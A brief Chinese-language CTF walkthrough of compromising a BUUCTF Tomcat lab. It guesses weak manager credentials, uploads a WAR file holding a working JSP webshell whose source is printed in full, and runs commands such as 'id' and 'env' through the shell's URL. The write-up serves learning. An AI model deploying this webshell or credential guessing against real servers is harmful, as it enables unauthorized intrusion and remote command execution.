Tomcat弱口令+后台getshell簡單復現


1.簡介

略過吧

2.環境

BUUCTF

3.動手

簡單的弱口令爆破,隨手試了幾個密碼什么的

admin:admin888
admin:admin123
tomcat:tomcat

這不就進來了嗎

不過看起來進錯了位置,再來應該是/manager/html這個路徑

4.編譯一個war包

jsp馬倒是有現成的,直接拿打包好的

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

上傳成功

看下路徑
http://613-5295901f-bec9-451e-99e2-d4839bc10fd7node3.buuoj.cn:28177/shell/jsp.jsp

5.上菜刀(菜刀刀)

菜刀刀連了下,連不上,嗚嗚嗚,哭泣

6.手連吧

http://613-5295901f-bec9-451e-99e2-d4839bc10fd7node3.buuoj.cn:28177/shell/jsp.jsp?pwd=123&i=id

7.拿flag

http://613-5295901f-bec9-451e-99e2-d4839bc10fd7node3.buuoj.cn:28177/shell/jsp.jsp?pwd=123&i=env


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM